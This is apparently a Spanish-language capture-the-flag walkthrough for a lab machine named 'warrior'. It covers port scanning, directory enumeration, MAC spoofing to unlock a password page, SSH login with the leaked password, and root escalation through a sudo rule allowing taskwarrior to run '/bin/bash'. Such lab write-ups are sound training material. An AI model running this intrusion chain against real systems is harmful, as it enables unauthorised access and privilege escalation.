Comenzamos con un escaneo general y específico de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oN 01-allPorts.txt 192.168.1.144❯ sudo nmap -sC -sV -p22,80 -oN 02-targeted.txt 192.168.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 22:21 -03
Nmap scan report for 192.168.1.144
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 25:16:8d:63:6b:75:f0:59:55:d4:b0:2d:75:8d:e0:e6 (RSA)
| 256 1e:29:d0:f4:c5:95:e7:40:30:2b:35:f7:a3:bc:36:75 (ECDSA)
|_ 256 cc:b1:52:b3:d7:ef:cd:73:4c:fc:f6:b5:51:77:ea:f3 (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:09:73:6E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 secondsEl sitio principal solo tiene un título y un comentario. Enumeramos con gobuster (el robots.txt ya adelantaba varias rutas):
❯ curl http://192.168.1.144
<h1>WARRIOR</h1>
<!-- YEAH -->
❯ gobuster dir -u http://192.168.1.144 -w ~/Documentos/git-clones/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt
...
/index.html (Status: 200) [Size: 31]
/user.txt (Status: 200) [Size: 5]
/admin (Status: 301) [Size: 169] [--> http://192.168.1.144/admin/]
/robots.txt (Status: 200) [Size: 137]
/internal.php (Status: 200) [Size: 82]
/secret.txt (Status: 200) [Size: 17]
...internal.php impone una condición curiosa: solo revela la contraseña si nuestra dirección MAC coincide con un patrón concreto:
❯ cat internal.php
Hey bro, you need to have an internal MAC as 00:00:00:00:00:a? to read your pass..Tenemos un usuario potencial (bro) y debemos falsificar nuestra MAC para que termine en a?. Probamos af cambiando la MAC de nuestra interfaz:
❯ sudo ifconfig wlo1 down
❯ sudo ifconfig wlo1 hw ether 00:00:00:00:00:af
❯ sudo ifconfig wlo1 upAl recargar internal.php, ahora nos devuelve la contraseña:
<br>Good!!!!!<!-- Your password is: Zurviv0r1 -->Nos conectamos por SSH como bro:
❯ ssh bro@192.168.1.144
bro@192.168.1.144's password: Zurviv0r1
Linux warrior 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 8 04:03:20 2022 from 192.168.1.51
bro@warrior:~$ whoami
broPara la escalada, sudo -l falla, pero al invocarlo con su ruta absoluta funciona:
bro@warrior:~$ /usr/sbin/sudo -l
Matching Defaults entries for bro on warrior:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bro may run the following commands on warrior:
(root) NOPASSWD: /usr/bin/taskPodemos ejecutar task (taskwarrior) como root. Según GTFOBins, permite ejecutar comandos:
sudo task execute /bin/shRecordando que sudo solo funciona con su ruta absoluta, lanzamos:
> /usr/sbin/sudo task execute /bin/bashObtenemos acceso root y capturamos la bandera.
Fin.